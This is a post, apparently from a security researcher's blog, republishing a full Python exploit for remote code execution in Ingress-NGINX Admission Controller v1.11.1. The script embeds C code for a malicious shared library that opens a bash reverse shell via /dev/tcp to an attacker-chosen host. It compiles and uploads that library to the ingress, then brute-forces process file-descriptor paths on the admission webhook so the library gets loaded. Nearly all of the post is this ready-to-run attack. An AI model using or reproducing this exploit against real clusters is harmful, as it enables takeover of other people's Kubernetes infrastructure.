Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Ingress-NGINX Admission Controller 1.11.1 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 95
Ingress-NGINX Admission Controller 1.11.1 Remote Code Execution
Ingress-NGINX Admission Controller 1.11.1 Remote Code Execution
Ingress-NGINX Admission Controller 1.11.1 Remote Code Execution

# Exploit Title: Ingress-NGINX Admission Controller 1.11.1 Remote Code Execution

# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://kubernetes.io
# Software Link: https://github.com/kubernetes/ingress-nginx
# Version: Affects v1.10.0 to v1.11.1 (potentially others)
# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster
# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974

import os
import sys
import socket
import requests
import threading
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# --- Embedded malicious shared object template ---
MALICIOUS_C_TEMPLATE = """
#include <stdlib.h>

__attribute__((constructor))
void run_on_load() {
system("bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'");
}

int bind(void *e, const char *id) {
return 1;
}

void ENGINE_load_evil() {}

int bind_engine() {
return 1;
}
"""

def compile_shared_library(host, port, output_file="evil_engine.so"):
c_code = MALICIOUS_C_TEMPLATE.replace("HOST", host).replace("PORT", str(port))

with open("evil_engine.c", "w") as f:
f.write(c_code)

print("[*] Compiling malicious shared object...")
result = os.system("gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto")

if result == 0:
print("[+] Shared object compiled successfully.")
return True
else:
print("[!] Compilation failed. Is gcc installed?")
return False


def send_brute_request(admission_url, json_template, proc, fd):
print(f"[*] Trying /proc/{proc}/fd/{fd}")
path = f"proc/{proc}/fd/{fd}"
payload = json_template.replace("REPLACE", path)

headers = {"Content-Type": "application/json"}
url = admission_url.rstrip("/") + "/admission"

try:
response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)
print(f"[+] Response for /proc/{proc}/fd/{fd}: {response.status_code}")
except Exception as e:
print(f"[!] Error on /proc/{proc}/fd/{fd}: {e}")


def brute_force_admission(admission_url, json_file="review.json", max_proc=50, max_fd=30, max_workers=5):
try:
with open(json_file, "r") as f:
json_data = f.read()
except FileNotFoundError:
print(f"[!] Error: {json_file} not found.")
return

print("[*] Starting brute-force against the admission webhook...")
with ThreadPoolExecutor(max_workers=max_workers) as executor:
for proc in range(1, max_proc):
for fd in range(3, max_fd):
executor.submit(send_brute_request, admission_url, json_data, proc, fd)


def upload_shared_library(ingress_url, shared_object="evil_engine.so"):
try:
with open(shared_object, "rb") as f:
evil_payload = f.read()
except FileNotFoundError:
print(f"[!] Error: {shared_object} not found.")
return

parsed = urlparse(ingress_url)
host = parsed.hostname
port = parsed.port or 80
path = parsed.path or "/"

try:
sock = socket.create_connection((host, port))
except Exception as e:
print(f"[!] Failed to connect to {host}:{port}: {e}")
return

fake_length = len(evil_payload) + 10
headers = (
f"POST {path} HTTP/1.1\r\n"
f"Host: {host}\r\n"
f"User-Agent: qmx-ingress-exploiter\r\n"
f"Content-Type: application/octet-stream\r\n"
f"Content-Length: {fake_length}\r\n"
f"Connection: keep-alive\r\n\r\n"
).encode("iso-8859-1")

print("[*] Uploading malicious shared object to ingress...")
sock.sendall(headers + evil_payload)

response = b""
while True:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk

print("[*] Server response:\n")
print(response.decode(errors="ignore"))
sock.close()


def main():
if len(sys.argv) != 4:
print("Usage: python3 exploit.py <ingress_url> <admission_webhook_url> <rev_host:port>")
sys.exit(1)

ingress_url = sys.argv[1]
admission_url = sys.argv[2]
rev_host_port = sys.argv[3]

if ':' not in rev_host_port:
print("[!] Invalid format for rev_host:port.")
sys.exit(1)

host, port = rev_host_port.split(":")

if not compile_shared_library(host, port):
sys.exit(1)

# Send the malicious shared object and keep the connection open
upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))
upload_thread.start()

# Simultaneously brute-force the admission webhook for valid file descriptors
brute_force_admission(admission_url)


if __name__ == "__main__":
main()
Social Media Share